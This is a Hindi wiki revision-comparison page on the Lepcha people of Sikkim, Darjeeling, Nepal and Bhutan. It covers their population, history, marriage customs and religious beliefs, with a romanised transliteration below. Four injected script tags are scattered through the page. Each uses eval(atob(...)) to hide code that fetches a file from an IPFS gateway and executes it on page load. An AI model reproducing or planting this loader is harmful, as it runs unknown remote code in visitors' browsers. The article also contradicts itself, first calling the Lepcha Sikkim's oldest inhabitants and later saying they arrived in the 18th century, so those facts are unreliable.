Difference between revisions of "लेप्चा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
{{tocright}}
 
{{tocright}}
लेप्चा एक प्रजाति है और इस प्रजाति के लोगों को रोंग भी कहा जाता हैं। पूर्वी [[नेपाल]], पश्चिमी [[भूटान]], [[सिक्किम]] राज्य और [[भारत]] के [[पश्चिम बंगाल]] राज्य के [[दार्जिलिंग ज़िला|दार्जिलिंग ज़िले]] के निवासियों को लेप्चा कहा जाता है। लेप्चा लोगों की कुल जनसंख्या 46 हजार है जिसमें भारत में 11 हज़ार, सिक्किम में 25 हज़ार और भूटान में 10 हज़ार है। ये सिक्किम के सबसे पुराने निवासी माने जाते हैं। 
+
लेप्चा एक प्रजाति है और इस प्रजाति के लोगों को रोंग भी कहा जाता हैं। पूर्वी [[नेपाल]], पश्चिमी [[भूटान]], [[सिक्किम]] राज्य और [[भारत]] के [[पश्चिम बंगाल]] राज्य के [[दार्जिलिंग ज़िला|दार्जिलिंग ज़िले]] के निवासियों को लेप्चा कहा जाता है। लेप्चा लोगों की कुल जनसंख्या 46 हजार है जिसमें भारत में 11 हज़ार, सिक्किम में 25 हज़ार और भूटान में 10 हज़ार है।  
 
==इतिहास==
 
==इतिहास==
यह लोग 14वीं शताब्दी और उसके बाद [[तिब्बत]] से सिक्किम आए भूटिया लोगों की [[संस्कृत|संस्कृति]] के कई तत्त्वों को अपना लिया है। भूटिया लोग मुख्यत: ऊँचे पहाड़ों के पशुपालक होते थे, लेप्चा लोग सामान्यत: दूरस्थ घाटियों में रहते थे। जहाँ इन दोनों समूहों के बीच कुछ अंतर्विवाह हुए हैं, वहीं वे अलग रहने व अपनी भाषाएँ बोलेने का प्रयास करते थे, जो तिब्बती भाषा की बोलियाँ हैं।  
+
ये सिक्किम के सबसे पुराने निवासी माने जाते हैं, लेकिन इन्होंने 14वीं शताब्दी और उसके बाद [[तिब्बत]] से सिक्किम आए भूटिया लोगों की [[संस्कृत|संस्कृति]] के कई तत्त्वों को अपना लिया है। भूटिया लोग मुख्यत: ऊँचे पहाड़ों के पशुपालक होते थे, लेप्चा लोग सामान्यत: दूरस्थ घाटियों में रहते थे। जहाँ इन दोनों समूहों के बीच कुछ अंतर्विवाह हुए हैं, वहीं वे अलग रहने व अपनी भाषाएँ बोलेने का प्रयास करते थे, जो तिब्बती भाषा की बोलियाँ हैं।  
  
 
लेप्चा समूह का नेपाली [[हिंदू]] अधिवासियों से कोई संबंध नहीं था, लेप्चा 18 वीं शताब्दी में सिक्किम आए और 20 वीं शताब्दी के अंत में जनसंख्या का दो -तिहाई भाग हो गए थे। लेप्चा लोग मुख्यत: एक ही विवाह करते थे, हालांकि एक विवाहित पुरूष अपने छोटे अविवाहित भाई को अपने साथ रहने और अपने खेत और पत्नी की साझीदारी हेतु निमंत्रित कर सकता था। कभी-कभी लेप्चा पुरूष की एक या अधिक पत्नियाँ भी हो सकती थी। लेप्चा अपना मूल पितृवंश के आधार पर मानते थे और उनके बड़े पितृसत्तात्मक वंश होते थे।  
 
लेप्चा समूह का नेपाली [[हिंदू]] अधिवासियों से कोई संबंध नहीं था, लेप्चा 18 वीं शताब्दी में सिक्किम आए और 20 वीं शताब्दी के अंत में जनसंख्या का दो -तिहाई भाग हो गए थे। लेप्चा लोग मुख्यत: एक ही विवाह करते थे, हालांकि एक विवाहित पुरूष अपने छोटे अविवाहित भाई को अपने साथ रहने और अपने खेत और पत्नी की साझीदारी हेतु निमंत्रित कर सकता था। कभी-कभी लेप्चा पुरूष की एक या अधिक पत्नियाँ भी हो सकती थी। लेप्चा अपना मूल पितृवंश के आधार पर मानते थे और उनके बड़े पितृसत्तात्मक वंश होते थे।  

Revision as of 12:05, 22 January 2011

lepcha ek prajati hai aur is prajati ke logoan ko roang bhi kaha jata haian. poorvi nepal, pashchimi bhootan, sikkim rajy aur bharat ke pashchim bangal rajy ke darjiliang zile ke nivasiyoan ko lepcha kaha jata hai. lepcha logoan ki kul janasankhya 46 hajar hai jisamean bharat mean 11 hazar, sikkim mean 25 hazar aur bhootan mean 10 hazar hai.

itihas

ye sikkim ke sabase purane nivasi mane jate haian, lekin inhoanne 14vian shatabdi aur usake bad tibbat se sikkim ae bhootiya logoan ki sanskriti ke kee tattvoan ko apana liya hai. bhootiya log mukhyat: ooanche paha doan ke pashupalak hote the, lepcha log samanyat: doorasth ghatiyoan mean rahate the. jahaan in donoan samoohoan ke bich kuchh aantarvivah hue haian, vahian ve alag rahane v apani bhashaean bolene ka prayas karate the, jo tibbati bhasha ki boliyaan haian.

lepcha samooh ka nepali hiandoo adhivasiyoan se koee sanbandh nahian tha, lepcha 18 vian shatabdi mean sikkim ae aur 20 vian shatabdi ke aant mean janasankhya ka do -tihaee bhag ho ge the. lepcha log mukhyat: ek hi vivah karate the, halaanki ek vivahit puroosh apane chhote avivahit bhaee ko apane sath rahane aur apane khet aur patni ki sajhidari hetu nimantrit kar sakata tha. kabhi-kabhi lepcha puroosh ki ek ya adhik patniyaan bhi ho sakati thi. lepcha apana mool pitrivansh ke adhar par manate the aur unake b de pitrisattatmak vansh hote the.

manyata

lepcha log bhootiya dvara tibbati bauddh dharm mean parivarvit kie ge the, lekin ab bhi lepcha log atmaoan ke kuloan v unake ojhaoan ki apani purani manyata ko manate the, jo logoan ke rogoan ka upachar karati thi. devataoan se madhyasthata karati haian aur janm, vivah tatha mrityu ke samay ki jane vali rasmoan mean pradhan hoti hai. paranparagat roop se shikari aur bhojan sangrahak lepcha ab krishi v pashupalan mean bhi sanlagn haian.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>